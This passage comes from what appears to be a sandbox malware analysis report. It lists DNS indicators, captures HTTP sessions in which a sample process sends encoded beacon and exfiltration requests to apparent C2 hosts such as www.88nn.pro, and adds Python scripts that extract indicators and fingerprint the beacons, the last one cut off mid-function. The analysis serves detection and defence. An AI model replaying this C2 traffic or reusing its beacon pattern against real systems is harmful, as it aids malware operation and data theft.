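    (0x60fe, 3, "www.taapbit.online", None, None),
    (0xe2a, 0, "www.ayypromo.shop", None, "176.57.64.102"),
    (0xc13d, 0, "www.anaidittrich.com", None, "162.55.254.209"),
    (0x8af8, 0, "www.551108k5.shop", "gangli.ssywan.com", None),
    (0x8af8, 0, "gangli.ssywan.com", None, "64.64.237.133"),
    (0x19ad, 0, "www.datensicherung.email", None, "85.13.151.9"),
    (0xc8c, 0, "www.jiyitf.top", None, "104.21.35.73"),
    (0xc8c, 0, "www.jiyitf.top", None, "172.67.215.136"),
    (0x9249, 0, "www.tadalaturbo.online", "tadalaturbo.online", None),
    (0x9249, 0, "tadalaturbo.online", None, "192.185.211.122"),
]


def seconds(ts):
    """'HH:MM:SS.fffffffff' -> seconds since midnight, keeping the full fraction."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def query_intervals(queries=QUERIES):
    """Gap in seconds between successive queries; a steady gap is the walk cadence."""
    t = [seconds(ts) for ts, _, _ in queries]
    return [round(b - a, 3) for a, b in zip(t, t[1:])]


def resolve_chain(txid, name, answers=ANSWERS):
    """Follow CNAME records inside one transaction down to the A records.

    Returns (rcode, cnames, addresses); rcode 3 with no addresses is NXDOMAIN.
    """
    cnames, addresses, rcode, seen = [], [], None, set()
    current = name
    while current not in seen:  # the seen set stops a CNAME loop
        seen.add(current)
        nxt = None
        for t, rc, n, cname, addr in answers:
            if t != txid or n != current:
                continue
            rcode = rc
            if cname:
                cnames.append(cname)
                nxt = cname
            elif addr:
                addresses.append(addr)
        if nxt is None:
            break
        current = nxt
    return rcode, cnames, addresses


def build_iocs(queries=QUERIES, answers=ANSWERS):
    """Map each queried name to its CNAME chain, resolved IPs and NXDOMAIN flag."""
    iocs = {}
    for _, txid, name in queries:
        rcode, cnames, addresses = resolve_chain(txid, name, answers)
        iocs[name] = {"cnames": cnames, "addresses": addresses, "nxdomain": rcode == 3}
    return iocs


def resolved_ips(iocs):
    """Flat, de-duplicated list of IPs worth blocking or hunting for."""
    return sorted({ip for v in iocs.values() for ip in v["addresses"]})


if __name__ == "__main__":
    print("query gaps (s):", query_intervals())
    for name, info in build_iocs().items():
        print(name, "->", info)
```

The gaps come out between roughly 8 and 16 seconds, which is the sample trying one domain, giving up, and moving to the next; 14 of the 15 names resolve, and the script hands back 15 distinct addresses, including the 192.185.211.122 host that the TCP rows at the top of this section show being contacted last.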
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 194.233.65.154 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:35:46.021095991 CEST | 478 | OUT | GET /v1m8/?56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.weep.site
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Sep 4, 2024 09:35:46.952487946 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:35:46 GMT
                  Server: Apache
                  Accept-Ranges: bytes
                  Cache-Control: no-cache, no-store, must-revalidate
                  Pragma: no-cache
                  Expires: 0
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html
                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
Sep 4, 2024 09:35:46.952512026 CEST | 1236 | IN | Data Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
Sep 4, 2024 09:35:46.952522993 CEST | 1236 | IN | Data Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
Sep 4, 2024 09:35:46.952533960 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
Sep 4, 2024 09:35:46.952547073 CEST | 896 | IN | Data Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
Sep 4, 2024 09:35:46.952558041 CEST | 1236 | IN | Data Raw: 49 39 63 63 48 52 43 64 78 55 65 59 61 6e 46 70 51 4a 4d 42 55 44 49 46 78 77 31 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c
                  Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
Sep 4, 2024 09:35:46.952574015 CEST | 224 | IN | Data Raw: 33 51 46 59 51 49 52 63 49 33 43 71 32 5a 4e 6b 33 74 59 64 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56
                  Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6
Sep 4, 2024 09:35:46.952584028 CEST | 1236 | IN | Data Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
                  Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
Sep 4, 2024 09:35:46.952609062 CEST | 261 | IN | Data Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
                  Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span clas
Sep 4, 2024 09:35:46.952620983 CEST | 1236 | IN | Data Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 20www.weep.site's <a href="mailto:38
Sep 4, 2024 09:35:46.956553936 CEST | 731 | IN | Data Raw: 3d 4b 68 62 38 70 54 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: =Khb8pT (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div> </section>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 45.157.69.194 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:36:02.038546085 CEST | 733 | OUT | POST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                  Data Ascii: 56gD=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
Sep 4, 2024 09:36:03.040432930 CEST | 302 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:02 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 45.157.69.194 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:36:04.573276043 CEST | 753 | OUT | POST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 68 59 54 37 66 46 37 37 2f 67 63 78 76 46 30 73 32 64 5a 79 59 76 4b 38 37 62 54 63 67 67 77 36 59 3d
                  Data Ascii: 56gD=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
Sep 4, 2024 09:36:05.428503036 CEST | 302 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:05 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 45.157.69.194 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:36:07.121974945 CEST | 10835 | OUT | POST /l4rw/ HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.88nn.pro
                  Referer: http://www.88nn.pro/l4rw/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 6c 74 2f 2b 50 70 72 43 4a 2f 31 31 61 54 4e 52 54 66 4a 33 38 4b 52 4e 68 49 6a 4d 4e 62 4c 58 2b 56 6c 69 2f 5a 76 55 43 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 7a 78 4c 45 54 64 34 57 51 37 68 6d 4c 33 72 6f 69 73 6c 38 71 69 36 76 4d 68 52 59 4b 66 6a 57 49 79 4d 34 41 79 67 2b 5a 2f 2f 48 6b 32 36 6f 4a 39 78 59 65 67 35 5a 4b 77 30 4f 57 70 4b 58 37 59 2b 36 6e 63 37 2b 37 79 42 2f 45 6a 67 72 75 36 [TRUNCATED]
Data Ascii: 56gD= [TRUNCATED]
Sep 4, 2024 09:36:08.229183912 CEST | 302 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:07 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 45.157.69.194 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
Timestamp | Bytes transferred | Direction | Data
Sep 4, 2024 09:36:09.679841995 CEST | 477 | OUT | GET /l4rw/?56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.88nn.pro
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Sep 4, 2024 09:36:10.532130957 CEST | 302 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:36:10 GMT
                  Content-Type: text/html
                  Content-Length: 138
                  Connection: close
                  ETag: "667cd175-8a"
                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


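Sessions 0 to 4 share one shape: the same spoofed Android User-Agent on every request, a four-character path per host (/v1m8/, /l4rw/), a GET whose query carries one short key with a base64-looking value plus a second short key, then POSTs with a form body under that same key (one of them over 10 KB), and a 404 from every server even though the request was accepted. The Python script below is an added example, not part of the Joe Sandbox report; it rebuilds those five requests from the session data above (the 10,301-byte body of session 3 is truncated in the report, so it is stood in for by a constructed body of the same length), parses them, and reduces them to a fingerprint an analyst can act on. The "beacon" heuristic and the Suricata rule at the end are derived from this report alone and are illustrative; the rule's sid is a placeholder.

```python
"""Added example (not part of the Joe Sandbox report): parse the HTTP sessions
above and reduce them to a beacon fingerprint."""
import re
from urllib.parse import parse_qs, urlsplit

# Observed on every request in sessions 0-4.
UA = ("Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) "
      "AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36")


def _get(host, path, query):
    return (f"GET {path}?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"User-Agent: {UA}\r\n\r\n")


def _post(host, path, body):
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
            f"Referer: http://{host}{path}\r\nConnection: close\r\n"
            f"Content-Length: {len(body)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {UA}\r\n\r\n{body}")


# (request, HTTP status the server answered with), transcribed from sessions 0-4.
# Session 3's body is truncated in the report; a constructed filler of the same
# length (10,301 bytes) stands in for it.
SESSIONS = [
    (_get("www.weep.site", "/v1m8/",
          "56gD=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/"
          "NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&gTSpc=Khb8pT"), 404),
    (_post("www.88nn.pro", "/l4rw/",
           "56gD=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+"
           "OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4x"
           "C0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw=="), 404),
    (_post("www.88nn.pro", "/l4rw/",
           "56gD=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7uk"
           "H8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEp"
           "MkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y="), 404),
    (_post("www.88nn.pro", "/l4rw/", "56gD=" + "A" * 10296), 404),   # constructed filler
    (_get("www.88nn.pro", "/l4rw/",
          "56gD=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnM"
          "vvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&gTSpc=Khb8pT"), 404),
]

BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, host, path, headers and form/query keys."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    parts = urlsplit(target)
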